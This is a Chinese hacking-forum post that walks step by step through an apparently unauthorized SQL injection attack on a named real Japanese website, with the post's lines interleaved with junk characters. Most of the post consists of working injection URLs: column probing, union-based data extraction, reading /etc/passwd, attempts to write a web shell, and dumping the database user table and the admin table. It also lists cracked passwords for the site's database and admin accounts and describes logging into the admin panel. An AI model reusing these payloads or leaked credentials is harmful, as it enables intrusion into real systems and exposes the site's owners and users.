找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3182|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
, B( M# t! S' n' j3 T
/ w  D/ s/ ?4 O. {! L* Y
0x01. 检测 www.zuaa.jp 收集数据
$ L* l+ ~% m  f' Z' k  h: l5 y$ _5 {6 k* k: e- D

* R3 `( T: O# j/ Y; c! e9 W: k; {whatweb1 m/ L/ a# C1 I" s' X% V- T; I. z
  g: ?- U3 {3 ^$ I( v0 m

7 n" a" J* R; j& {# ?利用NMAP扫描
( [4 r1 Q4 P; K# ]1 C: `' b+ l& l0 l8 j6 y) g
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
$ Q1 r$ S$ D5 |' N% `9 S) T- ~& b0x02.找注入点
0 T9 `3 k; M8 A找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
- P) A' {, _* i2 a2 D$ M. D2 Q1 m, W: G* S0 Q) z
  U1 q; r, v& g) J9 ]) ~/ w
0x03.order by0 ]; n9 p" r) ]
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 14 N! R! ~1 M8 `! b, L; C* P0 _! v
0 h* R* S2 ?; M! V
order by 28报错,order by 27正常. m& q. x& J/ C) n7 v

* ~; n7 |$ S0 b* L7 x* m6 E! F; ]0x04.   union手动查询
8 Y4 X. L8 y7 Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 6 G: e0 x  W. |; }8 P8 s
添加到 27 时正常显示 9 R: J/ C8 h/ V) @% i4 S

) m. w7 t. a' f$ Y/ V8 ]3 b中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
' D; O/ w! |  g0 G) ]" T6 o1 o
& d/ {# K7 f7 Q5 U, x* H1 g0x05. info:
- Z1 j: Y" K' k- x: {2 _$ phttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
- R0 d  m" P7 y& P5 S" O
$ v9 {9 ~5 w* d, |$ m: \( ^) Ouser:            root@localhost1 m2 b5 m% m, s  U6 V% ~9 ?* y
database:    openpne/ L; m! `2 b' i* k0 B
version:      4.1.226 x8 c6 _9 D  m% |9 J; t
os:             portbld-freebsd5.4% z4 L/ \2 l6 |; a+ ?9 [+ l- u

' Z) ~8 g3 z9 Y. ]4 J* ]3 h( r% h9 B0x06. root用户" B( Z8 d. W$ f) }, r& m) p
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
$ T' B- s# y, L: |- ]8 t/ k$ Chttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ q- t, i& T3 c2 _5 `. }0 V! ?+ Z8 U, F9 Q# A4 O
通过工具转换( b0 T# |2 G  g- Z7 `5 y; E% ?2 H

! l0 G" O1 J# ~# @) Q$ `  n- g中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持( R  _! A1 A! g' r- h
- g7 S0 B4 A4 ?- A* c
0x07. 利用 into outfile
& Z% X5 v6 A- {8 E  F% Z! d; @全部都失败6 r7 a5 r  ~/ a$ S
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php1 A0 a' u$ ~6 _

1 r+ o/ k. D, U4 xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
2 X5 [0 `; R5 L0 |
2 h! v* V9 j/ M) V; V页面显示“MDB2 Error:syntax error”3 K, {8 F' Z9 l% X' i/ E; K
' }6 N  \4 N6 G6 e9 D+ o
0x08. 利用 mysql 4.10 K5 g% A& w2 U! }9 F
猜常规表名,字段未果 工具 sqlmap0 K2 d; G( Y$ p8 o7 K" t( ?/ \
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
3 J% e. }' {  v  `) }* g$ M
+ @; M( p( I. n% b+ A% s7 M
" c* r4 e2 i5 V7 |+ x" y: i1 b
9 o( t+ l7 L% R+ n0 h- F- F0x09. 查找后台" J. e- {. x$ H0 _1 j
利用 现有的各种 后台工具尝试都不行1 ?8 A; L; Q2 v3 i
/ k4 ]* X" {( g7 m
0x10.  MySL外联方法
" H, a) {6 Y+ O; A" j5 h, L# o8 ]从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行8 B, L$ k7 Y& u+ w# r% C6 R& C; p
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
; A5 X# t8 o3 B! ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
1 E3 Y+ t7 B/ U. }! m
2 \9 b4 h' C) u0 J& O% b& X4 J这个可以在 www.cmd5.com 解密
4 |5 e3 H: }# V" \/ mroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
( D% V) z( B" K  \& Ychen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97; ?# j5 d) M3 v: e/ K
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???$ }( |/ n8 V; w, g& o% S1 Y( C
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???( I5 p2 r/ l9 [. t
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
6 ^8 Q* o/ C$ U, l0 a3 m9 U  S! j1 ^6 }2 q* E* Y% f

9 Y$ a  I0 D# m0x11. 网站突破
) T4 q3 {  W4 A3 G% v2 p  r发现网站的源程序 openpne, google 下载 openpne 源码
  p/ d' M2 |3 U$ x$ M" t3 C: S0 g! z
: @7 I) x$ c. @, d3 M0 m$ \( P
0x12. 默认信息利用
4 k/ P6 e) E4 ^, j) I# I: P% khttp://sns.zuaa.jp/?m=admin&a=page_login
' I2 \- _5 H  e& ]" Q2 }
: `9 p5 c# Y2 K1 t表名 (c_admin_user) ,字段名(username,password)
5 A7 @4 j/ `' Z. A0 Ehttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user  a% L3 `& l4 X0 k' u
, `3 |/ F4 V: J
解密
) ^" p3 P& k' t4 lzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
" z# v1 q) n4 }7 J# ^7 m/ T! Jzuaajp:c0923ec5857796a393da99905008c176,          zju1897
( O( G9 r& Z& J
/ E7 g. r1 `$ [: y  @中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持6 ^" j- v* s' c8 [, @3 ^2 l
# ]- q' d* e2 j) |- J* S
0x13. 登录后台6 X9 A' E2 V, t0 U2 N, r
* K$ W/ r8 a* v  g3 G; ~
; r1 T7 i$ U& k8 E, }

: R2 [7 n  `, U. S. _* t* _0x14. 小结$ H3 p( G4 F5 Z8 g$ A4 g/ m
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。# n3 x$ s! o+ o9 p, K, j  r
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
9 O1 D: p% @: R+ ~4 }6 K" A------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
$ a0 m- t! N& F+ [9 ^中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持0 c2 Z2 V# ]( S3 T& e7 J+ ?0 T6 ?4 {

' `6 G6 @) w) r( }# m最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
& Y& V6 v1 |9 H! t

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表